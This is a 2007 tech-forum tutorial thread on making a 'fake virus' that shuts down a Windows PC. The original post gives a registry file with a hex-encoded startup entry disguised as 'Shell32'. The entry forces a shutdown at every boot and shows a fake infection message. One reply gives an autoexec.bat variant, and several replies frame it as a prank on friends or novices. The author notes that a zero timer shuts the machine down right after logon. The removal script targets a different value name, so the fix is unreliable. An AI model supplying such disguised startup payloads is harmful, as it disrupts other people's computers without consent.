Forum     

Go Back   Digit Technology Discussion Forum > Community > Tutorials
Register FAQ Calendar Mark Forums Read

Tutorials This section offers tutorials and How to's on just about anything related to computers and IT. Note: All tutorials are courtesy the posters and not verified by Digit


Closed Thread
 
LinkBack Thread Tools Display Modes
Old 12-10-2007, 07:06 PM   #1 (permalink)
Ron
||uLtiMaTE WinNER||
 
Ron's Avatar
 
Join Date: Nov 2006
Location: Kathmandu,Nepal
Posts: 698
Arrow Create A Fake VIRUS


How Do I Create A Fake VIRUS?

This tutorial will help a user to create a fake virus………which will force the system to restart or shutdown after a specific period of time……

Warning: Use it at your own risk. I'll not be responsible for any kind of damage/problem in your system.

Well….. We all are aware of this program called SHUTDOWN.EXE which allows us to easily create icons to shutdown or restart our computer.

Quote:

Shutdown [{-l|-s|-r|-a}] [-f] [-m [\\ComputerName]] [-t xx] [-c "message"] [-d[u][p]xx:yy]

Parameters
-l - Logs off the current user, this is also the defualt. -m ComputerName takes
precedence.
-s - Shuts down the local computer.
-r - Reboots after shutdown.
-a - Aborts shutdown. Ignores other parameters, except -l and ComputerName.
You can only use -a during the time-out period.
-f - Forces running applications to close.
-m [\\ComputerName] - Specifies the computer that you want to shut down.
-t xx - Sets the timer for system shutdown in xx seconds. The default is 20
seconds.
-c "message" - Specifies a message to be displayed in the Message area of the
System Shutdown window. You can use a maximum of 127 characters. You must enclose the message in quotation marks.

We use this handy shortcut in Creating a Shutdown/Reboot Icon.
But this time It will be used for creating a virus……….
====

HOW TO CREATE A VIRUS?

Method One
  • Just open Notepad and paste the given code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK.
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Shell32"=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,75,00,74,00,64,\
  00,6f,00,77,00,6e,00,2e,00,65,00,78,00,65,00,20,00,2d,00,73,00,20,00,2d,00,\
  74,00,20,00,33,00,30,00,30,00,20,00,2d,00,63,00,20,00,22,00,59,00,6f,00,75,\
  00,72,00,20,00,43,00,6f,00,6d,00,70,00,75,00,74,00,65,00,72,00,20,00,69,00,\
  73,00,20,00,69,00,6e,00,66,00,65,00,63,00,74,00,65,00,64,00,20,00,77,00,69,\
  00,74,00,68,00,20,00,76,00,69,00,72,00,75,00,73,00,20,00,40,00,52,00,6f,00,\
  6e,00,61,00,6b,00,20,00,41,00,67,00,72,00,61,00,77,00,61,00,6c,00,22,00,00,\
  00
  • Restart Your PC to see the Effects.
Method Two

  • Click Start > Run.
  • Type regedit and press Enter after Run Window emerges.
  • Go To
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

Note
HKEY_LOCAL_MACHINE
This hive contains information about the computer itself, as well as about the operating system. It includes specific details about all hardware, including keyboard, printer ports, storage—the entire hardware setup. In addition, it has information about security, installed software, system startup, drivers, services, and the machine's specific XP configuration.
  • Click on Edit Menu > New > Expanded string value
Note
Expanded string value data type contains variables that Windows uses to point to the location of files. For example, to point to the location of the Luna theme file, the expanded string value in the Registry is %SystemRoot%\resources\Themes\Luna.theme.
  • Name the String value as “Shell32”.
  • Now, Double click on it to and Set its value as
%windir%\system32\shutdown.exe -s -t 300 -c "Your Computer is infected with virus @Ronak Agrawal"

Restart your PC to see the effects……….
====

HOW TO DELETE THE VIRUS?

  • Just open Notepad and paste the appropriate code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK.
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"shell"=hex(2):00,00
  • Restart Your PC to see the Effects.
=========
Pls Comment On this post……………
__________________
||uLtiMaTE WinNER||

Last edited by Ron; 15-10-2007 at 09:35 AM.
Ron is offline  
Advertisements. Register and be a member of the community to get rid of them.
Advertisement

Old 13-10-2007, 11:39 AM   #2 (permalink)
Core i7 (nehalem) Owner
 
ashu888ashu888's Avatar
 
Join Date: Jan 2005
Location: Mumbai
Posts: 3,404
Default Re: Create A Fake VIRUS

Nice one thanx
__________________
Core i7-920
MSi X58 Pro-E
Corsair 3x1GB
Tagan BZ1100
GTX280 SSC+MSi N580GTX TWIN FROZR II/OC
WD 1TB
22" Samsung 2233SW
APC SUA1500i UPS

Core i7:thinkdigit.com/forum/showthread.php?t=110397
ashu888ashu888 is offline  
Old 13-10-2007, 01:18 PM   #3 (permalink)
In The Zone
 
Join Date: Jul 2006
Posts: 236
Default Re: Create A Fake VIRUS

Old Stuff!
sai_cool is offline  
Old 13-10-2007, 01:21 PM   #4 (permalink)
In The Zone
 
anand1's Avatar
 
Join Date: Sep 2007
Location: 23 17'N, 86 05'E
Posts: 369
Default Re: Create A Fake VIRUS

Ya Good old one i have somewhere the sam trick. Anyways good work.
There are also many softwares which do the same as this trick.
__________________
Technology On The Fly
anand1 is offline  
Old 13-10-2007, 01:29 PM   #5 (permalink)
"The Cake is a Lie!!"
 
[xubz]'s Avatar
 
Join Date: Oct 2006
Posts: 471
Default Re: Create A Fake VIRUS

Offtopic: Um.. Virus? According to wikipedia "a computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. The original virus may modify the copies or the copies may modify themselves"

So well, There is a obvious difference between A Virus, Trojan, Malicious Scripts/Softwares and Spywares.


Intopic: Nice Trick BTW, Will be useful when a friend annoys you.
__________________
[xubz] ● http://xubz.com/
[steam_id] ● http://steamcommunity.com/id/xubz
[xubz] is offline  
Old 14-10-2007, 06:35 PM   #6 (permalink)
Ron
||uLtiMaTE WinNER||
 
Ron's Avatar
 
Join Date: Nov 2006
Location: Kathmandu,Nepal
Posts: 698
Default Re: Create A Fake VIRUS

thnks Guys..........

This tut is useful when a user do not know about much about comp

For an Ex:

Instead of 300 ........If i enter 00
%windir%\system32\shutdown.exe -s -t 00 -c "Your Computer is infected with virus @Ronak Agrawal"

The comp will shutdown just after the logon screen......................
__________________
||uLtiMaTE WinNER||
Ron is offline  
Old 14-10-2007, 07:44 PM   #7 (permalink)
Booting Nicotine!!
 
spironox's Avatar
 
Join Date: Jan 2004
Location: Paradox Box in the scrap yard
Posts: 313
Default Re: Create A Fake VIRUS

hahah great trick man great for newbies


any how have a look here for the cooling problems
http://www.thinkdigit.com/forum/tutorials/70652-how-have-super-cool-pc-without-spending-big-bucks.html#post631773
__________________
http://spironox.blogspot.com

Rig : Asus P4 p 800SE ( happy )
Netbook : Google chrome Cr-48 Mario !!! now that's what i call lucky & also an iBookG4 (2004)
spironox is offline  
Old 17-10-2007, 09:30 AM   #8 (permalink)
vaibhavtek
Guest
 
Posts: n/a
Default Re: Create A Fake VIRUS

gr8 Ron.
Keep it up.
 
Old 17-10-2007, 12:34 PM   #9 (permalink)
Alpha Geek
 
adi007's Avatar
 
Join Date: Sep 2007
Location: hassan
Posts: 717
Default Re: Create A Fake VIRUS

instead of doing all these ,i will infect my freind's comp with real virus itself
__________________
doiteasily.com ►easy way(s) to do certain things
Tech Word of the day : ADSL
Aditech Blog ► There is something for everyone
Terminal Command of the day
regtweak.info ► Windows Registry hacks and tricks
adi007 is offline  
Old 17-10-2007, 01:37 PM   #10 (permalink)
vaibhavtek
Guest
 
Posts: n/a
Default Re: Create A Fake VIRUS

Quote:
Originally Posted by adi007
instead of doing all these ,i will infect my freind's comp with real virus itself
How will you make real virus...???
 
Old 17-10-2007, 02:03 PM   #11 (permalink)
Human Spambot
 
Kiran.dks's Avatar
 
Join Date: Apr 2006
Location: Pune, India
Posts: 2,501
Default Re: Create A Fake VIRUS

Here is a harmless virus which a good antivirus should detect!
__________________
Kiran Kumar R
Kiran.dks is offline  
Old 17-10-2007, 03:07 PM   #12 (permalink)
vaibhavtek
Guest
 
Posts: n/a
Default Re: Create A Fake VIRUS

hey I am unable to download this file...???
 
Old 17-10-2007, 03:27 PM   #13 (permalink)
Human Spambot
 
Kiran.dks's Avatar
 
Join Date: Apr 2006
Location: Pune, India
Posts: 2,501
Default Re: Create A Fake VIRUS

Quote:
Originally Posted by vaibhavtek
hey I am unable to download this file...???
Just right-click & select "Save target as". If a good antivirus is active, it should give warning, atleast when saving the file on desktop.
__________________
Kiran Kumar R
Kiran.dks is offline  
Old 17-10-2007, 03:39 PM   #14 (permalink)
vaibhavtek
Guest
 
Posts: n/a
Default Re: Create A Fake VIRUS

ya it gives me waning...
 
Old 18-10-2007, 02:46 AM   #15 (permalink)
Mclaren F1 Long tail
 
aneesh kalra's Avatar
 
Join Date: Aug 2006
Location: Delhi
Posts: 144
Default Re: Create A Fake VIRUS

Actually I was thinking on the same lines and was thinking of posting a similar tutorial.But mine is a little simpler and uses batch file programming

Step 1 Open notepad and write shutdown.exe -s -t 5 here 5 is the time in seconds after which the computer will shutdown.Now save the above file as
shutdown.bat in your desired location.

Step 2 Go to Start>Run and type edit c:\autoexec.bat .A dos like window will appear and here write CALL c:\shutdown.bat(this is in the case when you save the file in step 1 at this location).

Now as you all know autoexec.bat runs during every startup and hence the desired computer will shutdown itself after every 5 seconds of shutdown.bat being executed.
__________________
Computers are like air conditioners. They work fine until you start opening windows.
aneesh kalra is offline  
Old 18-10-2007, 04:07 PM   #16 (permalink)
Ron
||uLtiMaTE WinNER||
 
Ron's Avatar
 
Join Date: Nov 2006
Location: Kathmandu,Nepal
Posts: 698
Arrow Re: Create A Fake VIRUS

thnks buddy..
__________________
||uLtiMaTE WinNER||
Ron is offline  
Closed Thread

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Is this Fake? amanjagga QnA (read only) 1 26-09-2007 05:58 PM
is this fake ? Saharika QnA (read only) 7 22-09-2007 01:42 PM
fake web cam raj98104 Software Q&A 6 25-02-2007 08:03 PM
Is it fake? himtuna QnA (read only) 17 16-02-2007 10:51 AM
Create Fake file of ur choice. Projjwal Tutorials 3 25-01-2007 10:51 AM

 
Latest Threads
- by Who
- by Krow
- by clmlbx
- by Tech&ME
- by icebags

Advertisement




All times are GMT +5.5. The time now is 09:03 PM.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2012, vBulletin Solutions, Inc.

Search Engine Optimization by vBSEO 3.3.2